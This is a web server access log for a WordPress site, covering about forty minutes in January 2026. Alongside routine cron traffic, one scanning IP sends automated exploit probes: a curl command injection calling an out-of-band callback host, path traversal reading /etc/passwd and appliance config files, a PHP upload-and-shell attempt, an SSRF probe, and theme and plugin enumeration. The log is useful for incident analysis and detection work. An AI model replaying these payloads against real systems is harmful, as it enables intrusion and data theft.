103.4.122.14 - - [13/Jan/2026:19:37:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768304241.4193649291992187500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:37:18 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:37:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768304272.5678539276123046875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:37:49 +0800] "POST /graphql HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:37:50 +0800] "POST /v1/submissions/create HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:19:39:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768304349.9138479232788085937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:39:06 +0800] "POST /upload HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:39:07 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
165.232.54.158 - - [13/Jan/2026:19:39:09 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:40:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768304428.4116380214691162109375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:40:25 +0800] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d5iu610i9qj8svou82p0d47i1wbig6ao7.oast.fun+-H+%27User-Agent:+BZuMS3%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d5iu610i9qj8svou82p0mofiqyrm8j4td.oast.fun+-H+%27User-Agent:+BZuMS3%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:40:26 +0800] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d5iu610i9qj8svou82p0ack8zqe6i1qsg.oast.fun+-H+%27User-Agent:+BZuMS3%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d5iu610i9qj8svou82p075kwaimk1qxqw.oast.fun+-H+%27User-Agent:+BZuMS3%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 301 - "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:40:28 +0800] "POST /storfs-asup HTTP/1.1" 404 10877 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:19:41:41 +0800] "GET /images/..%2finfo.html HTTP/1.1" 404 196 "https://nutritaste.com.au/info.html" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/115.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:46:20 +0800] "GET /images/..%2finfo.html HTTP/1.1" 404 196 "https://nutritaste.com.au/info.html" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:19:47:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768304825.7425670623779296875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:47:02 +0800] "POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:19:47:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768304867.7149419784545898437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:47:44 +0800] "POST /init_ctl.cgi HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:19:48:01 +0800] "GET /images/..%2finfo.html HTTP/1.1" 404 196 "https://nutritaste.com.au/info.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:19:48:05 +0800] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 404 196 "https://nutritaste.com.au/info.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:50:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768305008.0262939929962158203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:50:04 +0800] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/111.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:50:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768305013.4811120033264160156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:19:50:11 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:19:51:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768305079.6488399505615234375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:51:16 +0800] "POST /apply_sec.cgi HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:51:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768305086.2862010002136230468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:51:23 +0800] "POST /apply_sec.cgi HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:19:52:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768305125.0083088874816894531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:52:01 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:19:52:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768305126.7002210617065429687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:52:03 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:52:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768305157.4469859600067138671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:52:34 +0800] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
165.232.54.158 - - [13/Jan/2026:19:52:40 +0800] "POST /adminer.php HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:19:52:40 +0800] "POST /adminer/index.php HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:52:40 +0800] "POST /_adminer/index.php HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:52:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768305163.4572999477386474609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:52:40 +0800] "POST /index.php HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Debian; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:19:52:40 +0800] "POST /_adminer.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:52:40 +0800] "POST /adminer/adminer.php HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:53:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768305210.7191870212554931640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:53:27 +0800] "POST /casa/nodes/thumbprints HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
165.232.54.158 - - [13/Jan/2026:19:55:16 +0800] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 403 199 "https://nutritaste.com.au" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:57:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768305429.6677579879760742187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:57:06 +0800] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
103.4.122.14 - - [13/Jan/2026:19:58:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768305522.7790589332580566406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:58:39 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [13/Jan/2026:19:58:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768305530.3944571018218994140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:58:47 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:59:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768305587.6202409267425537109375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:59:44 +0800] "POST /api/v4/ci/lint HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [13/Jan/2026:19:59:54 +0800] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:59:58 +0800] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
165.232.54.158 - - [13/Jan/2026:20:00:02 +0800] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:00:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768305610.0268549919128417968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:00:08 +0800] "POST /?wordfence_syncAttackData=1768305608.5097 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:00:06 +0800] "GET /hsqldb%0a HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [13/Jan/2026:20:00:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768305617.3810369968414306640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:00:14 +0800] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:00:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768305624.4731199741363525390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:00:21 +0800] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
103.4.122.14 - - [13/Jan/2026:20:00:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768305631.2061069011688232421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:00:28 +0800] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:00:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768305638.1814661026000976562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:00:35 +0800] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/112.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:00:41 +0800] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:20:00:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768305644.1852030754089355468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:00:41 +0800] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:20:01:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768305692.6008079051971435546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:01:29 +0800] "POST /AdminService/urest/v1/LogonResource HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:20:01:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768305701.2875049114227294921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:01:38 +0800] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:01:44 +0800] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/38Btk3tQRqbiUxdFYYAdwhgp5gi.cfm HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:01:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768305711.1826090812683105468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:01:48 +0800] "POST /lucee/38Btk3tQRqbiUxdFYYAdwhgp5gi.cfm HTTP/1.1" 404 10885 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:02:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768305756.7208759784698486328125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:02:33 +0800] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 404 10864 "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:02:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768305760.2315280437469482421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:02:37 +0800] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:02:49 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
103.4.122.14 - - [13/Jan/2026:20:02:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768305776.2713088989257812500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:02:53 +0800] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0"
103.4.122.14 - - [13/Jan/2026:20:05:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768305906.5185599327087402343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:05:03 +0800] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\" HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:07:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768306051.6824800968170166015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:07:28 +0800] "POST /mgmt/shared/authn/login HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/performag/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/minus/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/luxe/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/squared/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/focusblog/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/ignition/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/pressive/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:20:12:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768306373.7010350227355957031250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/rise/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/storied/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:12:50 +0800] "GET /wp-content/themes/voice/style.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:13:19 +0800] "POST /wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:13:24 +0800] "GET /wp-content/uploads/hstmp/T62uvB.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:14:02 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
165.232.54.158 - - [13/Jan/2026:20:15:25 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:15:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768306548.1750230789184570312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:15:43 +0800] "GET /wp-content/plugins/cleantalk-spam-protect/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:15:49 +0800] "POST /?wordfence_syncAttackData=1768306548.9866 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:16:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768306575.5751330852508544921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
